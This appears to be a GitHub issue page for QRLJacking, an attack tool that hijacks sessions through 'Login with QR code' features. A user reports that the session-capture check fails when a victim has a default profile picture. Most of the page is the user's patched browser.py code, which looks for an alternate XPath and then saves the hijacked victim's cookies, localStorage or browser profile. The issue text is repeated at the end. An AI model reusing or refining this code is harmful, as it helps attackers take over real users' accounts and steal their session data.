QRLJacking or Quick Response Code Login Jacking is a simple-but-nasty attack vector affecting all the applications that relays on “Login with QR code” feature as a secure way to login into accounts which aims for hijacking users session by attackers.
GNU General Public License v3.0
1.33k
stars
619
forks
source link
If user has no profile picture the change_identifier is different and wouldn't work [Made temp fix] #236
when the hijacked user's profile picture is the default, its not an img element and the xPath is different
its this:
/html/body/div[1]/div/div[2]/div[3]/header/div[1]/div/div/span
instead of this
/html/body/div[1]/div/div/div[4]/header/div[1]/div/img
I made a temporary fix in browser.py
try:
identifier = controller.find_element(By.XPATH, change_identifier)
if identifier:
# If the identifier is found the attack has
# been successful
print()
status(f"Got session on {module_name} module")
if session_type.lower() == "localstorage":
self.save_localstorage(module_name)
elif session_type.lower() == "cookies":
self.save_cookie(module_name)
else:
self.save_profile(module_name)
if Settings.verbose:
status("Resetting browser cookies and localStorage to start over..")
if not session_type.lower() == "profile":
controller.delete_all_cookies()
controller.execute_script("window.localStorage.clear()")
controller.refresh()
if Settings.verbose:
status("Session reset successfully")
time.sleep(5)
else:
# Identifier found! Can now close the
# session and stop listening
self.close_job(module_name)
self.close_all()
else:
time.sleep(5)
except:
# Identifier not found: wait end continue listening
try:
identifier2 = controller.find_element(By.XPATH, "/html/body/div[1]/div/div[2]/div[3]/header/div[1]/div/div/span")
if identifier2:
# If the identifier is found the attack has
# been successful
print()
status(f"Got session on {module_name} module")
if session_type.lower() == "localstorage":
self.save_localstorage(module_name)
elif session_type.lower() == "cookies":
self.save_cookie(module_name)
else:
self.save_profile(module_name)
if Settings.verbose:
status("Resetting browser cookies and localStorage to start over..")
if not session_type.lower() == "profile":
controller.delete_all_cookies()
controller.execute_script("window.localStorage.clear()")
controller.refresh()
if Settings.verbose:
status("Session reset successfully")
time.sleep(5)
else:
# Identifier found! Can now close the
# session and stop listening
self.close_job(module_name)
self.close_all()
else:
time.sleep(5)
except:
time.sleep(5)
when the hijacked user's profile picture is the default, its not an img element and the xPath is different its this: /html/body/div[1]/div/div[2]/div[3]/header/div[1]/div/div/span instead of this /html/body/div[1]/div/div/div[4]/header/div[1]/div/img
I made a temporary fix in browser.py
I had the same issue as #206